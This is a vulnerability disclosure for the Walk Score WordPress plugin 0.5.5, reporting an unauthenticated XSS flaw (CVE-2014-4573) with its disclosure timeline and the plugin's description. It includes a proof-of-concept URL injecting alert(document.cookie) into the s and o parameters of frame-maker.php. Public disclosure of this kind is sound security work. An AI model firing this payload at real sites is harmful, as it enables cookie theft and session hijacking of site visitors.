wp-plugin : walk-score

Plugin Details
Plugin Name: wp-plugin : walk-score
Effected Version : 0.5.5 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/walk-score/frame-maker.php?a=a&s=s’>alert(document.cookie)&id=id&o=o’>alert(document.cookie)&

 

Vulnerable Parameter : s, o


Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Status : Updated on
Public Disclosure : June 12, 2014
CVE Number : CVE-2014-4573
Plugin Description :
[| Provides WordPress shortcodes for embedding [Walk Score Neighborhood Maps](http://www.walkscore.com/professional/neighborhood-map.php?utm_source=wspi) in your posts and pages. Walk Score Neighborhood Maps display a map for any address that shows a property's location on a map, Walk Score (0-100 score measuring how walkable the location is) and nearby amenities. With the interactive map your visitors can create a Commute Report showing drive times to work to that location, explore lists of amenities by category (schools,restaurants, coffee shops, etc). The map displays a Google map by default, but offers your visitors options to use Street View (Google), Bird's Eye view (Bing), a walkability heat map and a 15-minute walkability zone (walkshed). Features in Walk Score 0.5 series include: * Embed neighborhood maps in posts. * Set default sizes (small, medium or large) and format (vertical or horizontal) * Override default settings in the shortcode for a specific post You'll need a [Walk Score ID](http://www.walkscore.com/professional/sign-up.php?utm_source=wspi) to use it this plugin. The ID is free for personal blogs, with paid subscriptions you can remove ads and outbound links. ]